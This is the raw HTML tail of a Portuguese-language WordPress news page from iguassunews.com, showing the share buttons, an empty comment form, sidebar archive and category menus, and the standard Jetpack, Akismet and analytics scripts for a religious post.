href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=telegram" target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-33494" class="share-skype sd-button share-icon no-text" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-33494" class="share-linkedin sd-button share-icon no-text" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-12891280-33494-6066e18c247d9' data-src='https://widgets.wp.com/likes/#blog_id=12891280&amp;post_id=33494&amp;origin=iguassunews.com&amp;obj_id=12891280-33494-6066e18c247d9' data-name='like-post-frame-12891280-33494-6066e18c247d9'><h3 class="sd-title">Curtir isso:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Curtir</span></span> <span class="loading">Carregando...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "JESUS É RESSURREIÇÃO E A VIDA!"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/jesus-e-ressurreicao-e-a-vida/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="http://iguassunews.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='33494' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="3cba5d33df" /></p><input type="hidden" id="ak_js" name="ak_js" value="112"/><textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100" style="display: none !important;"></textarea></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>		<label class="screen-reader-text" for="archives-dropdown-2">Arquivos</label>
		<select id="archives-dropdown-2" name="archive-dropdown">
			
			<option value="">Selecionar o mês</option>
				<option value='http://iguassunews.com/2021/04/'> abril 2021 </option>
	<option value='http://iguassunews.com/2021/03/'> março 2021 </option>
	<option value='http://iguassunews.com/2021/02/'> fevereiro 2021 </option>
	<option value='http://iguassunews.com/2021/01/'> janeiro 2021 </option>
	<option value='http://iguassunews.com/2020/12/'> dezembro 2020 </option>
	<option value='http://iguassunews.com/2020/11/'> novembro 2020 </option>
	<option value='http://iguassunews.com/2020/10/'> outubro 2020 </option>
	<option value='http://iguassunews.com/2020/09/'> setembro 2020 </option>
	<option value='http://iguassunews.com/2020/08/'> agosto 2020 </option>
	<option value='http://iguassunews.com/2020/07/'> julho 2020 </option>
	<option value='http://iguassunews.com/2020/04/'> abril 2020 </option>
	<option value='http://iguassunews.com/2020/03/'> março 2020 </option>
	<option value='http://iguassunews.com/2019/12/'> dezembro 2019 </option>
	<option value='http://iguassunews.com/2019/11/'> novembro 2019 </option>
	<option value='http://iguassunews.com/2019/10/'> outubro 2019 </option>
	<option value='http://iguassunews.com/2019/09/'> setembro 2019 </option>
	<option value='http://iguassunews.com/2019/08/'> agosto 2019 </option>
	<option value='http://iguassunews.com/2019/07/'> julho 2019 </option>
	<option value='http://iguassunews.com/2019/06/'> junho 2019 </option>
	<option value='http://iguassunews.com/2019/05/'> maio 2019 </option>
	<option value='http://iguassunews.com/2019/04/'> abril 2019 </option>
	<option value='http://iguassunews.com/2019/03/'> março 2019 </option>
	<option value='http://iguassunews.com/2019/02/'> fevereiro 2019 </option>
	<option value='http://iguassunews.com/2019/01/'> janeiro 2019 </option>
	<option value='http://iguassunews.com/2018/12/'> dezembro 2018 </option>
	<option value='http://iguassunews.com/2018/11/'> novembro 2018 </option>
	<option value='http://iguassunews.com/2018/10/'> outubro 2018 </option>
	<option value='http://iguassunews.com/2018/09/'> setembro 2018 </option>
	<option value='http://iguassunews.com/2018/08/'> agosto 2018 </option>
	<option value='http://iguassunews.com/2018/07/'> julho 2018 </option>
	<option value='http://iguassunews.com/2018/06/'> junho 2018 </option>
	<option value='http://iguassunews.com/2018/05/'> maio 2018 </option>
	<option value='http://iguassunews.com/2018/04/'> abril 2018 </option>
	<option value='http://iguassunews.com/2018/03/'> março 2018 </option>
	<option value='http://iguassunews.com/2018/02/'> fevereiro 2018 </option>
	<option value='http://iguassunews.com/2018/01/'> janeiro 2018 </option>
	<option value='http://iguassunews.com/2017/12/'> dezembro 2017 </option>
	<option value='http://iguassunews.com/2017/11/'> novembro 2017 </option>
	<option value='http://iguassunews.com/2017/10/'> outubro 2017 </option>
	<option value='http://iguassunews.com/2017/09/'> setembro 2017 </option>
	<option value='http://iguassunews.com/2017/08/'> agosto 2017 </option>

		</select>

<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "archives-dropdown-2" );
	function onSelectChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {
			document.location.href = this.options[ this.selectedIndex ].value;
		}
	}
	dropdown.onchange = onSelectChange;
})();
/* ]]> */
</script>
			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4><form action="http://iguassunews.com" method="get"><label class="screen-reader-text" for="cat">Categorias</label><select  name='cat' id='cat' class='postform' >
	<option value='-1'>Selecionar categoria</option>
	<option class="level-0" value="7">Argentina</option>
	<option class="level-0" value="4">Brasil</option>
	<option class="level-0" value="9">Colunas</option>
	<option class="level-1" value="19">&nbsp;&nbsp;&nbsp;Blogsfera News</option>
	<option class="level-1" value="839">&nbsp;&nbsp;&nbsp;Caio Gottlieb</option>
	<option class="level-1" value="17">&nbsp;&nbsp;&nbsp;É Direito</option>
	<option class="level-1" value="725">&nbsp;&nbsp;&nbsp;Espaço Cristão</option>
	<option class="level-1" value="10">&nbsp;&nbsp;&nbsp;Nossa Voz</option>
	<option class="level-0" value="312">Economia</option>
	<option class="level-0" value="702">Espaço Cristão</option>
	<option class="level-0" value="866">Esporte</option>
	<option class="level-0" value="1">Extra</option>
	<option class="level-0" value="6">Foz do Iguaçu</option>
	<option class="level-0" value="864">Infraestrutura</option>
	<option class="level-0" value="14">Internacional</option>
	<option class="level-0" value="12">Latinoamerica</option>
	<option class="level-0" value="858">Meio Ambiente</option>
	<option class="level-0" value="868">Mercosul</option>
	<option class="level-0" value="865">Pandemia</option>
	<option class="level-0" value="8">Paraguay</option>
	<option class="level-0" value="5">Paraná</option>
	<option class="level-0" value="308">Política</option>
	<option class="level-0" value="860">Responsabilidade Social</option>
	<option class="level-0" value="863">Saúde</option>
	<option class="level-0" value="856">Tecnologia</option>
	<option class="level-0" value="859">Terceiro Setor</option>
	<option class="level-0" value="370">Tríplice Fronteira</option>
	<option class="level-0" value="857">Turismo</option>
	<option class="level-0" value="703">Última Hora</option>
</select>
</form>
<script type="text/javascript">
/* <![CDATA[ */
(function() {
	var dropdown = document.getElementById( "cat" );
	function onCatChange() {
		if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) {
			dropdown.parentNode.submit();
		}
	}
	dropdown.onchange = onCatChange;
})();
/* ]]> */
</script>

			</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2021 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/iguassunews.com\/jesus-e-ressurreicao-e-a-vida\/":33494};
	</script>
				<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/photon/photon.min.js' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/comment-reply.min.js' id='comment-reply-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/postmessage.min.js' id='postmessage-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/jquery.jetpack-resize.min.js' id='jetpack_resize-js'></script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/likes/queuehandler.min.js' id='jetpack_likes_queuehandler-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/wp-embed.min.js' id='wp-embed-js'></script>
<script type='text/javascript' id='jetpack-carousel-js-extra'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"pt","ajaxurl":"http:\/\/iguassunews.com\/wp-admin\/admin-ajax.php","nonce":"fd08302fb5","display_exif":"1","display_comments":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Coment\u00e1rio","post_comment":"Publicar coment\u00e1rio","write_comment":"Escreva um Coment\u00e1rio","loading_comments":"Carregando coment\u00e1rios...","download_original":"Visualizar tamanho original <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Certifique-se de enviar algum texto com o seu coment\u00e1rio.","no_comment_email":"Informe um endere\u00e7o de e-mail para comentar.","no_comment_author":"Forne\u00e7a seu nome para comentar.","comment_post_error":"Desculpe, mas ocorreu um erro ao postar seu coment\u00e1rio. Tente novamente mais tarde.","comment_approved":"Seu coment\u00e1rio foi aprovado.","comment_unapproved":"Seu coment\u00e1rio est\u00e1 aguardando modera\u00e7\u00e3o.","camera":"C\u00e2mera","aperture":"Abertura","shutter_speed":"Velocidade do Obturador","focal_length":"Comprimento Focal","copyright":"Direito autoral","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/iguassunews.com\/wp-login.php?redirect_to=http%3A%2F%2Figuassunews.com%2Fjesus-e-ressurreicao-e-a-vida%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">E-mail (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nome (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Site<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/carousel/jetpack-carousel.min.js' id='jetpack-carousel-js'></script>
<script async="async" type='text/javascript' src='http://iguassunews.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.9' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/sharedaddy/sharing.min.js' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-twitter' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-twitter' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-facebook' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-facebook' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-telegram' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-telegram' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-skype' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-skype' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
						return false;
					}
				} );
			} )();
var windowOpen;
			( function () {
				function matches( el, sel ) {
					return !! (
						el.matches && el.matches( sel ) ||
						el.msMatchesSelector && el.msMatchesSelector( sel )
					);
				}

				document.body.addEventListener( 'click', function ( event ) {
					if ( ! event.target ) {
						return;
					}

					var el;
					if ( matches( event.target, 'a.share-linkedin' ) ) {
						el = event.target;
					} else if ( event.target.parentNode && matches( event.target.parentNode, 'a.share-linkedin' ) ) {
						el = event.target.parentNode;
					}

					if ( el ) {
						event.preventDefault();

						// If there's another sharing window open, close it.
						if ( typeof windowOpen !== 'undefined' ) {
							windowOpen.close();
						}
						windowOpen = window.open( el.getAttribute( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
						return false;
					}
				} );
			} )();
</script>
	<iframe src='https://widgets.wp.com/likes/master.html?ver=202113#ver=202113&amp;lang=pt-br' scrolling='no' id='likes-master' name='likes-master' style='display:none;'></iframe>
	<div id='likes-other-gravatars'><div class="likes-text"><span>%d</span> blogueiros gostam disto:</div><ul class="wpl-avatars sd-like-gravatars"></ul></div>
	<script src='https://stats.wp.com/e-202113.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.5',blog:'12891280',post:'33494',tz:'-3',srv:'iguassunews.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '33494' ]);
</script>
</body>
</html>